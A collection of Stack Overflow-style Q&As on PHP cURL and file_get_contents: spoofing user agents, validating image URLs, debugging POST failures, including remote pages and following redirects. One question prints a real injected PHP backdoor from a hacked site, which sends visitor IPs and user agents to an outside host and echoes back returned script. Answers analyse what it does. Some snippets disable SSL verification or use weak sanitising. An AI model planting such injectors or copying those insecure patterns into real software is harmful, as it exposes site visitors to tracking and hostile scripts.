I am writing code in PHP that fetches content in a particular format from around 20 websites. It works normally for all of the websites except one. Now, here is the issue.
I am using file_get_contents() to fetch images from the website and save them on my server. The image is present on the remote server and is accessible via a browser, but I get a 404 response when fetching it via code.
I am unable to understand the issue, as this method works perfectly for the other websites.
Does it have something to do with the headers being sent? Any help will be greatly appreciated.
The answer is probably: yes...
They're checking user-agents, I suppose.
And those are sent in your headers. You can fake your user-agent. Don't use plain file_get_contents() for that, though, as on its own it doesn't let you fake your user-agent.
Look into cURL.
Edit 1
Barmar's link shows that it is possible to use file_get_contents() with a different user-agent after all. It's worthwhile looking into...
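For reference, a minimal sketch of that approach using a stream context (the user-agent string is just an example):
// file_get_contents() accepts a stream context, so you can send a custom
// User-Agent without switching to cURL
$context = stream_context_create(array(
    'http' => array(
        'user_agent' => 'Mozilla/5.0 (X11; Linux x86_64) MyFetcher/1.0', // example UA
    ),
));
$image = file_get_contents($url, false, $context); // $url is your image URL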
Edit 2
But it could also be that they're checking the referrer... If that is the case, you really need to use cURL to be able to set the referrer.
Edit 3
Having seen the URL now, and given that you get a 404 error (not a 50x), I advise you to check whether the URL is being escaped and parsed correctly. I see that the URL contains spaces and two slashes after the domain name. Check that the spaces are escaped to %20 and that the double slash is stripped down to just one slash.
So
http://celebslam.celebuzz.com//bfm_gallery/2014/03/Lindsay Lohan 2 Broke Girls/gallery_enlarged/gallery_enlarged-lindsay-lohan-2-broke-girls-01.jpg
Should become
http://celebslam.celebuzz.com/bfm_gallery/2014/03/Lindsay%20Lohan%202%20Broke%20Girls/gallery_enlarged/gallery_enlarged-lindsay-lohan-2-broke-girls-01.jpg
And notice, the server is CaSe-SeNsItIvE!
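A rough sketch of that cleanup (assuming the double slash is always accidental and only the path needs encoding):
$parts = parse_url($url); // $url is the raw image URL from the remote site
$path  = preg_replace('#/+#', '/', $parts['path']); // collapse '//' into '/'
// percent-encode each path segment, so spaces become %20
$path  = implode('/', array_map('rawurlencode', explode('/', $path)));
$clean = $parts['scheme'] . '://' . $parts['host'] . $path;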
Yep, first of all: check whether that site checks the referrer on image access. For example, try to fetch the image directly in the browser.
It can also check the User-Agent field, among other things.
It will probably help to fetch the file with cURL (code examples are easy to find, or I'll give you a simple class).
P.S. Just curious: can you give some example image URLs to try?
Probably the referrer or the user agent. This covers both:
function file_get_contents_custom($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    // send the URL itself as the referrer
    curl_setopt($ch, CURLOPT_REFERER, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    // pretend to be a regular browser
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7');
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}
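Usage is then a drop-in replacement for file_get_contents() (the URL and save path below are placeholders):
$data = file_get_contents_custom('http://example.com/remote-image.jpg');
if ($data !== false) {
    file_put_contents('/path/to/local/image.jpg', $data); // save on your server
}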
Update:
The image you linked works fine for me using file_get_contents. It might be that the server has some sort of DDoS protection. How many requests per second are you making on average?
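If rate limiting turns out to be the cause, throttling your fetch loop is the easiest test. A minimal sketch, assuming you fetch the images in a loop ($imageUrls is a hypothetical array of URLs):
foreach ($imageUrls as $imageUrl) {
    $data = file_get_contents_custom($imageUrl); // the helper above
    // ... save $data ...
    usleep(500000); // wait 0.5 s between requests to stay under any rate limit
}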
Related
I want to allow users to upload urls for images (a bit like on this site in the markup). The only difference is that I'm going to store these in my database. I want to ensure nothing too malicious can be done.
After looking around, I've seen recommendations to use cURL to check the Content-Type, since getimagesize() apparently downloads the full image, which not only has security implications (apparently; I'm really not an expert) but will therefore also be slow.
So far my code is looking like this:
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
// don't download the body, just the headers
curl_setopt($curl, CURLOPT_NOBODY, 1);
curl_setopt($curl, CURLOPT_FAILONERROR, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
if (curl_exec($curl) === FALSE) {
    curl_close($curl);
    return false;
}
$contentType = curl_getinfo($curl, CURLINFO_CONTENT_TYPE); // get content type
curl_close($curl);
// strpos() returns 0 (a falsy value) when the match is at the start of the
// string, e.g. "image/png", so compare against false explicitly
if (strpos($contentType, 'image') !== false) {
    // valid image
}
However, I'm not entirely sure this is the correct way to go about it. I've also seen a lot about sanitising the URLs, but I'm not entirely sure what that would entail.
Any help on securing this part of my web app and preparing it for storage would be highly appreciated.
As a quick aside, I'm hoping to do the same for YouTube links, so if you have any recommendations for that I'd appreciate it, though I've not begun researching it yet.
Regards,
Mike
You can also escape special chars and whatnot using the snippet below:
<?php
$url = htmlspecialchars(addslashes($_POST["inputName"])); // "inputName" is your form field
?>
This will add slashes and turn & signs into HTML entities (https://www.w3schools.com/html/html_entities.asp), so you might need to reverse this process when reading the data back from the database.
If you're going to allow users to upload a file by URL, start by downloading the file (using cURL, or any other tool you like). Don't bother making an initial request to check the Content-Type: what ultimately matters is the content of the file, not the headers it happens to be served with by the original server.
Once you've downloaded the image, perform any further checks on the local file. Make sure it is an appropriate format, and is not too large, then convert it to your preferred format.
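A minimal sketch of that flow (the 5 MB cap and temp file handling are illustrative assumptions, not recommendations):
$tmp = tempnam(sys_get_temp_dir(), 'img'); // temporary local copy
$fp  = fopen($tmp, 'wb');
$ch  = curl_init($url);
curl_setopt($ch, CURLOPT_FILE, $fp);            // stream the download to disk
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_MAXFILESIZE, 5 * 1024 * 1024); // best-effort size cap
curl_exec($ch);
curl_close($ch);
fclose($fp);

// inspect the actual bytes, not the remote server's headers
$info = getimagesize($tmp); // false if the file is not a readable image
if ($info === false || filesize($tmp) > 5 * 1024 * 1024) {
    unlink($tmp);
    // reject the upload
}
// $info[2] holds an IMAGETYPE_* constant, e.g. IMAGETYPE_PNG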
Other notes:
Don't use a fake User-Agent. Use an accurate one which identifies the web site responsible for the request, e.g. "MySite/1.0 http://example.com/". (Other webmasters will thank you for this!)
It's a good idea to do a DNS lookup on the domain before requesting it, to protect your server from DNS rebinding attacks. Make sure that the resulting IP does not point to your private network or to localhost before you make an HTTP request (a sketch follows below).
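A sketch of that lookup. Note that FILTER_FLAG_NO_PRIV_RANGE and FILTER_FLAG_NO_RES_RANGE cover the common private and reserved blocks, but this is not an exhaustive defence; to fully beat rebinding you would also need to connect to the validated IP rather than re-resolving the hostname:
$host = parse_url($url, PHP_URL_HOST);
$ip   = gethostbyname($host); // returns $host unchanged on lookup failure

// reject private (10.x, 172.16-31.x, 192.168.x) and reserved (127.x, ...) ranges
$ok = filter_var($ip, FILTER_VALIDATE_IP,
                 FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
if ($ok === false) {
    // refuse to fetch: the hostname resolves somewhere we shouldn't reach
}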
Recently a website I have been involved with was hacked, with unauthorised code placed on a number of pages. I was just wondering if anyone could shed any light on what exactly this code does, and what benefit it would be to the user who placed it on these pages.
<?php
#31e3cd#
error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = #$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>
Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:
$_SERVER['HTTP_USER_AGENT']
It is then combined into a URL similar to the one below, but with the user information from above added to the URL:
http://html-href.com/href/?ip=::1&referer=localhost&ua=
I know cURL is used in the transfer of data, but where exactly is this information being sent, and what is its purpose?
The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's useragent string. It's then printing onto your site any code it receives from the cURL request. The code received could be anything. It could be HTML, JavaScript, or any other client side code. It's probably not server-side code since there's no eval() running the code received.
It appears to target Internet Explorer, Chrome, and Firefox browsers, but not crawlers/bots.
EDIT: As FDL pointed out in his comment, this appears to be printing only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.
$_SERVER['HTTP_USER_AGENT'] is used to identify the kind of web browser (or possibly crawler) with which the client requested the resource. For instance, the snippet preg_match('/Gecko|MSIE/i', $wp_okpbo35639) checks whether the client browser is Firefox (Gecko) or IE (MSIE). But this is not a foolproof way to determine the source browser, as user-agents can easily be changed or switched.
I have the same code running on multiple sites/servers. 2 days ago the code started returning http_code = 0 and the error message "empty reply from server" on one of the servers.
Can anyone shed any light as to why a particular server would be working one day, then not working the next? I have submitted a ticket to the ISP explaining the issue but they cannot seem to find what is wrong (yet).
I guess the question really is, what would/could change on a server to stop this from working?
What is interesting, though, is that the URL I am referencing doesn't get touched on the server returning the error. If I change the URL to point to something that doesn't exist, the same error is returned. So it appears that cURL POST requests as a whole are being rejected by the server. I currently have other cURL scripts hitting these problem sites that are still working, but they do not have POST options in them.
The issue is definitely related to cURL POST requests on this server, and they are being rejected pretty much immediately.
On the server in question I have 15+ separate accounts, and every one of them returns the same result, so I don't think it's anything I have changed: I know I haven't made any wholesale changes to ALL the sites at the time this issue arose. Of the 6 other sites I have hosted elsewhere, everything is still working fine with exactly the same code.
I have tried various combinations of and changes to the options, based on posts I have read, but nothing has really made a difference: the working sites still work and the non-working sites still don't.
function sendWSRequest($url, $xml) {
    // $headers[] = 'Content-Type: application/xml; charset=utf-8';
    $headers[] = 'Content-Type: text/xml; charset=utf-8';
    $headers[] = 'Content-Length: ' . strlen($xml);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_HEADER, true);
    // curl_setopt($ch, CURLINFO_HEADER_OUT, false);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $xml);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    // curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
    $result = curl_exec($ch);
    if ($result === false) {
        print 'error with curl - ' . curl_error($ch) . '<br />';
    }
    $info = curl_getinfo($ch);
    curl_close($ch);
    return $result;
}
Any help would be greatly appreciated.
EDIT
To summarise based on further investigation: when the script errors, nothing registers in the server access logs. So it appears that cURL requests containing POST options are being rejected before access is granted/logged...
Cheers
Greg J
I know this is an old thread, but I found a solution that may save someone else a headache:
I just began encountering this exact problem with a web site hosted at GoDaddy which was working until recently. To investigate the problem I created an HTML page with a form containing the same fields being submitted in the POST data via cURL.
The browser-submitted HTML form worked while the cURL POST resulted in the Empty reply from server error. So I examined the difference between the headers submitted by the browser and those submitted by cURL using the PHP apache_request_headers() function on my development system where both the cURL and browser submissions worked.
As soon as I added the "User-Agent" header submitted by my browser to the cURL POST, the problem site worked as expected instead of returning an empty reply:
CURLOPT_HTTPHEADER => array(
    "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0"
)
I did not experiment with other/simpler User-Agent headers since this quick fix solved my problem.
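In curl_setopt() form, the same fix amounts to one extra line in a function like the one in the question (CURLOPT_USERAGENT sets the same header):
// send an explicit User-Agent along with the POST
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0');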
According to the PHP manual, upload should be urlencoded:
CURLOPT_POSTFIELDS The full data to post in a HTTP "POST" operation.
[...] This parameter can either be
passed as a urlencoded string like 'para1=val1&para2=val2&...' or as
an array with the field name as key and field data as value. If value
is an array, the Content-Type header will be set to
multipart/form-data. As of PHP 5.2.0, value must be an array if files
are passed to this option with the # prefix. As of PHP 5.5.0, the #
prefix is deprecated and files can be sent using CURLFile.
So you might try with
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'xml=' . urlencode($xml));
and see what happens. Or, in any case, start with an empty or very simple POST field to see if it at least arrives at the destination server.
Update
I've checked this setup on a test machine and it works. The problem is then likely not on the PHP or cURL side at all. Can you request a list of software/hardware updates applied to that machine and network in the last few days?
Otherwise, I'd try to capture outgoing traffic to determine whether the request leaves the server (and the problem is somewhere in between, e.g. a misconfigured firewall, hence my inclusion of "hardware" in the change list) or doesn't leave the server at all. In the latter case, the culprits could be:
updates to cURL library
updates to PHP cURL module and/or PHP binaries
updates to "software" firewall rules
updates to ancillary network libraries (unlikely; they should be HTTP agnostic and not differentiate a POST from, say, a GET or HEAD)
OK, as it turns out, a rather reluctant host recompiled Apache2 and PHP which has resolved the issue.
The host claims (their opening statement to my support ticket) that no updates to either Apache2 or PHP had been performed around the time the issue occurred.
The behavior was such that the server wasn't even acknowledging a cURL request that contained the POST options. The target URL was never reached.
Thank you so much to all who provided their advice, particularly Isemi, who has gone to great lengths to find a resolution.
I need to include a URL in PHP.
I used the following code:
<? include 'http://my_server.com/some_page.jsp?test=true'; ?>
The problem is that the page some_page.jsp acts differently based on the User-Agent request header, which appears not to be sent by the above include statement...
So how can I force PHP to send the request headers along to the included page as well?
Thanks.
That is a bad pattern to use. If the page is on your own server, you should just include it via a relative path (why invoke HTTP?), and if it isn't, you are basically handing the keys to your site over to the other domain.
To request another document with a different user agent, try the cURL library.
Do not continue, for informative purposes only...
If you must run the resulting PHP code (and I strongly advise you don't; most importantly, ask yourself why?), you can then eval() the response.
Update
You need allow_url_include to be on in order to include a URL, and it is off by default. If you enable it, you can then set the user agent with the user_agent ini option.
If you are doing this to join a php and jsp site together, you should try and stick to only sending data between them, not code for the other to run over HTTP.
The statement:
<? include 'http://my_server.com/some_page.jsp?test=true'; ?>
is not going to act as you expect.
Check out HttpClient:
http://scripts.incutio.com/httpclient/
It has a user manual and examples.
You can't set all the HTTP headers that are sent, but you can set the user-agent string that is sent like so:
<?
ini_set("user_agent", $_SERVER["HTTP_USER_AGENT"]);
include 'http://my_server.com/some_page.jsp?test=true';
?>
The user_agent value is NULL by default, which is why you don't currently see anything being sent.
That should do the trick. Note that if the .jsp file returns HTML content rather than PHP, you should use readfile(), not include.
I'd highly advise you not to use your code in a live environment, ever. Instead, use Client-URL (cURL).
For example, you can do it like this:
$ch = curl_init();
// the website
curl_setopt($ch, CURLOPT_URL, 'http://www.example.com/path/to/webpage');
// this line sets up curl so the website contents will be returned
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// the user agent, for example Firefox
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB5');
$html = curl_exec($ch);
curl_close($ch); // free the handle when done
If you absolutely need to execute the code afterwards, then you can perform a lot of checking and eval() it, but only if you have to. A better approach would be some kind of dictionary.
I know that using cURL I can see the destination URL by pointing cURL at a URL with CURLOPT_FOLLOWLOCATION = true.
Example :
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "www.example1.com");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
$info = curl_getinfo($ch); //Some information on the fetch
curl_close($ch);
$info will have the URL of the final destination, which can be www.example2.com.
I hope my above understanding is correct. Please let me know if it is not!
My main question is: what types of redirection will cURL be able to follow?
Apache redirects, JavaScript redirects, form submission redirects, meta-refresh redirects?
Update
Thanks for your answers, @ceejayoz and @Josso. So is there a way I can follow all the redirects programmatically through PHP?
cURL will not follow JS or meta tag redirects.
I know this answer is a little late, but I ran into a similar issue and needed more than just following the HTTP 301/302 redirects. So I wrote a small library that also follows rel=canonical and og:url meta tags.
https://github.com/mattwright/URLResolver.php
I found that meta refresh tags did not provide much benefit, but they are followed if no <head> or <body> HTML tag is returned.
As far as I know, it only follows HTTP header redirects (301 and 302).
curl is a multi-protocol library which provides just a little HTTP support, but not much more that will help in your case. You could manually scan for the meta refresh tag as a workaround (a rough sketch follows below).
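Something along these lines, with the caveat that the regex is deliberately loose and will miss unusual markup:
// returns the target of a <meta http-equiv="refresh" content="0;url=..."> tag,
// or null if the page has none
function get_meta_refresh_target($html) {
    $pattern = '/<meta[^>]*http-equiv=["\']?refresh["\']?[^>]*' .
               'content=["\']?\d+\s*;\s*url=([^"\'>]+)/i';
    if (preg_match($pattern, $html, $m)) {
        return trim($m[1]);
    }
    return null;
}
Combined with CURLOPT_FOLLOWLOCATION for the HTTP-level redirects, looping on this until it returns null gets you reasonably close to what a browser does.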
But a better idea would be to check out PEAR HTTP_Request or the Zend_Http class, which more likely already provide something like this. Also phpQuery might be relevant, as it comes with its own HTTP functions, but it could easily ->find("meta[refresh]") if there's a need. Or look for a Mechanize-like browser class: Is there a PHP equivalent of Perl's WWW::Mechanize?
I just found this on the PHP site. It parses the response to find redirects and follows them. I don't think it handles every type of redirect, but it's pretty close:
http://www.php.net/manual/en/ref.curl.php#93163
I'd copy it here, but I don't want to plagiarize.